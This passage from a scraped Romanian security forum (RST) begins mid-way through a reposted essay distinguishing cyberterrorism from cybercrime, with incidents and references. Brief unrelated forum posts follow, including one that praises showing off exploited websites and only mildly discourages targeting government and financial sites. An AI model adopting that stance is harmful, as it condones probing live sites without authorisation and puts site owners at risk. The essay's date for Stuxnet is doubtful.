here is to hinder the normal functioning of computer systems, services, or websites. The methods used are defacing, denying, and exposing. Since the Western countries are highly dependent on online structures supporting vital services, these methods are of proven merit. However, disruptive activities usually do not entail grave consequences, except perhaps in cases of an unpredictable knock-on effect (Brickey, 2012). Destructive Because this purpose is directed towards achieving the same or similar results as classical terrorism, it is labelled pure cyberterrorism. Through the use of computer technology and the Internet, the terrorists seek to inflict destruction or damage on tangible property or assets, and even death or injury to individuals. There are no cases of pure cyberterrorism up to date, but perhaps its occurrence is only a matter of time, given the fact that the states’ critical infrastructure have significant security flaws (Brickey, 2012). History and Instances The first cyber attack by a terrorist was recorded in 1998 when the Black Tigers guerillas jammed Sri Lankan embassy email inboxes with hundreds of emails for a couple of weeks, generated by special software. In the course of the Kosovo war in 1998, NATO computers were subjected to denial-of-service attacks and email bombs. Web defacement against US government websites was conducted by Chinese activists as retaliation for the accidental bombing of the Chinese embassy in Belgrade by NATO forces. As a whole, cyberterrorism wasn’t really popular until the end of the millennium. At this particular moment, the big hysteria around the Millennium bug started to kindle peoples’ imagination. There were many apocalyptic scenarios which apparently did not transpire. Nevertheless, the fear of what might happen, either intentionally or by accident, if computers or technology were to go wrong, remained. Then the 9/11 terrorist attacks happened, leading inevitably to a new wave of anxiety with relation to all possible terrorist threats. In 2007, Estonia’s government and economy was struck by distributed denial-of-service attacks allegedly conducted by a Russian group. Nonetheless, neither NATO investigators nor European Commission experts could not link the cyber attack to the Russian government. Following a more recent series of events, in 2008, the Stuxnet worm sabotaged an Iranian nuclear plant. The Iranian government cast the blame on the joint efforts of USA and Israel. The latest cyber attacks on Saudi Aramco, RasGas, and US banks are considered as a strike back from the Iranian side. Cybercrime An increasing number of criminals are attracted by cybercrimes, because these types of crimes are convenient, anonymous, quick, diverse, and relatively low-risk. In the past, cybercrimes were committed by individuals or groups without decent organization, whilst nowadays organized crime structures and highly-trained professionals are deeply involved in this lucrative criminal activity. According to Interpol intelligence, just in the years 2007 and 2008, the damage from cybercrimes worldwide in numbers was evaluated at approximately 8 billion USD. In addition, the negative impact that corporate espionage brought on the intellectual property business worldwide was estimated at 1 trillion USD (Interpol, 2012). Cybercrimes encompass the following range of illegal activities: - attacks against computer data or network - internet theft - internet fraud - interference of online financial services - distribution of sexual content concerning children - distribution of malicious software, Botnets - email scam and phishing/pharming - copyright or intellectual property infringement The diagram below (GAO, 2007) briefly outlines the differences between traditional criminal techniques and cybercrime: Click to see the report from the United States Government Accountability Office Noticing the difference between cyberterrorism and cybercrime Depending on the context, cyberterrorism may overlap considerably with cybercrime or ordinary terrorism. When we talk about cybercrime and cyberterrorism, one of the underlying issues is the correct differentiation between the meaning of these terms. Often both terms are used interchangeably, a fact which brings confusion to people unfamiliar with details on that matter. If one observes a particular case and its context, this confusion may be further exacerbated by the application of other similar terms like Cyberwarfare. Brett Pladna (2008: 5), Information Security Specialist, also admits that it is often not an easy task to make a distinction between computer network attacks performed by terrorists and cyber-crimes done by hackers. This is so because the attacker, whoever that is, always tries to exploit weak spots in the system regardless of the essence of the real motives. Nevertheless, there are certain trends that can help in making a clear difference between both acts. For instance, in most of the cases of terrorist computer network attacks, the terrorists’ actions have been focused on website defacement and email bombing. For cyberterrorism cases to be regarded in a way similar to classical terrorism, the acts of the former needs more or less to bear the character and magnitude of the latter, meaning death/injury to human beings or physical destruction or damage to property, and to be inflicted through the means of the Internet. The term cyberterrorism usually comprises acts that resemble to a certain extent those which are characteristic of terroristic attacks via conventional means. As to the term cybercrime, it generally includes an illicit activity on the Internet as a whole. In order to overcome the disambiguation issue, scholars, institutions at international and domestic level, and legislation bodies should adopt a more appropriate course, in terms of law and politics. Once cybercrime and cyberterrorism terms are determinable, we would have a clear view on how to deal with such malignant acts. The only way to avoid that psychological condition is to strip both terms of the vagueness and ambiguity surrounding them. Conclusion Despite the fact that many observers deem that terrorist organizations like Al Qaeda do not rely on cyber attacks to achieve their ends, there is enough evidence material indicating the opposite. As it may seem probable from the late events connected to cyber attacks across the globe, there is an impending cyber threat. Without doubt, the terrorists desire to explore every option to cause great damage to their targets. Apparently, cyberspace provides a new battleground which every self-respecting opportunist would be willing to exploit either for criminal activities or cyber attacks at a minor or large scale. People tend to be frightened of what is unknown, of that which is veiled under obscurity. Knowledge and enlightenment is always a power which can disperse the cloud that prevents one to see clearly the truth. By finding a way that even the common people would be able to understand clearlythe essence of terms like “cyberspace,” “cybercrime,” and “cyberterrorim,” we can ensure that there will be less digital loopholes that the terrorists could take advantage of. Reference List Barry Collin, “The Future of CyberTerrorism,” Proceedings of the 11th Annual International Symposium on Criminal Justice Issues, The University of Illinois at Chicago, 1996. Retrieved also on 12/12/2012 from The Future of CyberTerrorism Brickey, J. (2012). Defining Cyberterrorism: Capturing a Broad Range of Activities in Cyberspace. Combating Terrorism Center at West Point. Retreived on 12/12/2012 from Defining Cyberterrorism: Capturing a Broad Range of Activities in Cyberspace | Combating Terrorism Center at West Point Interpol, (2012). Cybercrime. Retreived on 12/12/2012 from Cybercrime / Cybercrime / Crime areas / Internet / Home - INTERPOL [h=3]NATO, (2008). Cyber defence concept MC0571. Brussels, Belgium.[/h] Pladna, B. (2008). Cyber terrorism and information security. Retrieved on 12/12/2012 from http://www.infosecwriters.com/text_resources/pdf/BPladna_Cyber_Terrorism.pdf [h=3]Shinder, D. L.(2002). Scene of the Cybercrime: Computer Forensics Handbook. Syngress, Rockland (MA), USA.[/h] Stanley, N. (2010). The truth behind cybercrime, cyberwarfare, cyberterrorism and hacktivism. Retrieved on 12/12/2012 from Cybercrime, Cyberwars, Cyberterrorism and Hacktivism - Part 1 | Bloor Stohl, M. (2007). Cyber terrorism: A clear and present danger, the sum of all fears, breaking point or patriot games? Journal of Crime, Law and Social Change,46(4). U.S. Department of State, Office of the Coordinator for Counterterrorism, Country Reports on Terrorism, April 30, 2007. United States Government Accountability Office (GAO), (2007). CYBERCRIME Public and Private Entities Face Challenges in Addressing Cyber Threats. Report to Congressional Requesters. Retrieved on 12/12/2012 from http://www.gao.gov/new.items/d07705.pdf Wikia (2012). IT Law Wiki – Cybercrime. Accessed on 12/12/2012 Cybercrime - The IT Law Wiki [h=3]Wilson, C. (2003). Computer Attack and Cyber Terrorism: Vulnerabilities and Policy Issues for Congress. CRS Web.[/h] Wilson, C. (2005). Computer Attack and Cyberterrorism: Vulnerabilities and Policy Issues for Congress. CRS Report for Congress.Retreived on 12/12/2012 from Computer Attack and Cyberterrorism: Vulnerabilities and Policy Issues for Congress Sursa: InfoSec Institute Resources – Cyberterrorism Defined (as distinct from “Cybercrime”)

ShowOff-ul e una dintre cele mai importante parti ale RST-ului. Nu e ceva rau, dimpotriva, nu exista o alta metoda mai buna de a invata "securitate web" decat aceasta. Nu poti spune ca stii sa previi/repari o vulnerabilitate web daca nu stii cum se exploateaza. In plus exista firme mari care ofera sume substantiale de bani celor care gasesc probleme de securitate in site-urile proprii: Google, Facebook, Paypal si chiar incurajez lumea sa cauta vulnerabilitati in acele site-uri. Sigur, ar fi de preferat evitarea site-urilor guvernamentale si mai ales ale institutiilor financiare...

Fixed. Thanks.

Verificati daca puteti sa va schimbati avatarul/profile picture/signature picture.

E vina mea, am facut ceva modificari

Nullcon Delhi 2012: Another Security Lab - By Joerg Simon Description: This talk introduces and demonstrates the latest development state of the Fedora Security Lab and how it implements and aids the "Open Source Security Testing Methodology Manual" by creating the OSSTMM Lab as a tool set for teaching security. It introduces how - based on real scientific work - the OSSTMM Methodology helps to go a proper security testpath and how the metric works in order to ascertain and quantify security and trust not only for Computer and Network Security. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Nullcon Delhi 2012: Another Security Lab - By Joerg Simon

Da, asta cred si eu, si e cel mai bine asa.